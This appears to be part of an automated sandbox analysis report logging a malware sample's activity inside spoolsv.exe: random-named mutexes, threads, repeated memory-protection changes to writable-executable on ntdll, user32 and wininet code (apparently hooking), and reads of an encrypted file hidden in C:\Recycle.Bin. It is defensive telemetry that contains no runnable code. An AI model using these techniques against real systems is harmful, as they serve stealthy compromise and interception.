C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 A406B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3416 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 A40639
3400 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3404 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3432 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
3428 1496 7C8106F9 false C:\WINDOWS\system32\spoolsv.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
13312 0s success or wait 189 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3416 1496 success or wait 0 A40279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1496 C:\WINDOWS\system32\spoolsv.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 A405EC
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1496 C:\WINDOWS\system32\spoolsv.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
1496 C:\WINDOWS\system32\spoolsv.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
1496 C:\WINDOWS\system32\spoolsv.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
1496 C:\WINDOWS\system32\spoolsv.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1496 C:\WINDOWS\system32\spoolsv.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1496 C:\WINDOWS\system32\spoolsv.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1496 C:\WINDOWS\system32\spoolsv.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1496 C:\WINDOWS\system32\spoolsv.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1496 C:\WINDOWS\system32\spoolsv.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1496 C:\WINDOWS\system32\spoolsv.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1496 C:\WINDOWS\system32\spoolsv.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1496 C:\WINDOWS\system32\spoolsv.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1496 C:\WINDOWS\system32\spoolsv.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1496 C:\WINDOWS\system32\spoolsv.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1496 C:\WINDOWS\system32\spoolsv.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2325927875
Thread created PID: 1496 TID: 3416 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2325947035
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2325948796
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2325967324
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A50000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2325975025
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2325982500
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2325992047
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2326130135
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2326131717
Thread created PID: 1496 TID: 3400 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326138235
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2326140697
Thread delayed Time: 0 TID: 13312 success or wait 2326140833
System info queried Type: BasicInformation success or wait 2326141166
System info queried Type: ProcessorInformation success or wait 2326141469
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326141876
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326146204
System info queried Type: BasicInformation success or wait 2326147035
System info queried Type: ProcessorInformation success or wait 2326147332
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326148617
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326148924
Thread created PID: 1496 TID: 3404 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326150515
Thread created PID: 1496 TID: 3432 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326153344
Thread delayed Time: 0 TID: 13312 success or wait 2326155808
Thread delayed Time: 0 TID: 13312 success or wait 2326156211
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326156395
System info queried Type: BasicInformation success or wait 2326156695
System info queried Type: ProcessorInformation success or wait 2326156995
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326157400
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326161194
System info queried Type: BasicInformation success or wait 2326162018
System info queried Type: ProcessorInformation success or wait 2326162312
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326163543
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326163851
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326164161
System info queried Type: BasicInformation success or wait 2326164457
System info queried Type: ProcessorInformation success or wait 2326164746
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326165151
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326168902
System info queried Type: BasicInformation success or wait 2326169716
System info queried Type: ProcessorInformation success or wait 2326170012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326171235
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326171541
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326171848
System info queried Type: BasicInformation success or wait 2326172143
System info queried Type: ProcessorInformation success or wait 2326172431
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326172832
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326177015
System info queried Type: BasicInformation success or wait 2326177822
System info queried Type: ProcessorInformation success or wait 2326178117
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326179349
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326179661
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326180174
System info queried Type: BasicInformation success or wait 2326180474
System info queried Type: ProcessorInformation success or wait 2326180767
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326181172
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326184987
System info queried Type: BasicInformation success or wait 2326185805
System info queried Type: ProcessorInformation success or wait 2326186101
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326187329
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326187638
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2326188638
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2326190957
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2326191959
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326204321
System info queried Type: BasicInformation success or wait 2326204633
System info queried Type: ProcessorInformation success or wait 2326204948
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326205365
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2326206514
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2326207199
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2326207522
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2326208414
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2326209407
System info queried Type: BasicInformation success or wait 2326210581
System info queried Type: ProcessorInformation success or wait 2326210889
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326212192
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326212519
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326212916
System info queried Type: BasicInformation success or wait 2326213228
System info queried Type: ProcessorInformation success or wait 2326213521
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326213938
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326215063
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326215731
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326216046
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326216924
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326217801
System info queried Type: BasicInformation success or wait 2326218628
System info queried Type: ProcessorInformation success or wait 2326218928
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326220612
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326220913
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326221297
System info queried Type: BasicInformation success or wait 2326221610
System info queried Type: ProcessorInformation success or wait 2326221902
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326222314
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326223446
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326224112
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326224433
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326225316
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326226198
System info queried Type: BasicInformation success or wait 2326227022
System info queried Type: ProcessorInformation success or wait 2326227327
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326229012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326229318
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326229710
System info queried Type: BasicInformation success or wait 2326230007
System info queried Type: ProcessorInformation success or wait 2326230301
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326230719
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326231844
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326232513
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326232831
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326233711
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326234593
System info queried Type: BasicInformation success or wait 2326235421
System info queried Type: ProcessorInformation success or wait 2326235723
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326237404
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326237709
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326238438
System info queried Type: BasicInformation success or wait 2326238749
System info queried Type: ProcessorInformation success or wait 2326239043
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326239457
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326240573
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326241241
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326241557
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326242434
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326243313
System info queried Type: BasicInformation success or wait 2326244136
System info queried Type: ProcessorInformation success or wait 2326244437
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326246482
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326246784
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2326247672
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2326249052
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326271740
System info queried Type: BasicInformation success or wait 2326272039
System info queried Type: ProcessorInformation success or wait 2326272342
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326272753
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326273905
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326274575
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326274894
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326275777
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326276582
System info queried Type: BasicInformation success or wait 2326276888
System info queried Type: ProcessorInformation success or wait 2326276998
System info queried Type: BasicInformation success or wait 2326277966
System info queried Type: ProcessorInformation success or wait 2326278073
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326278226
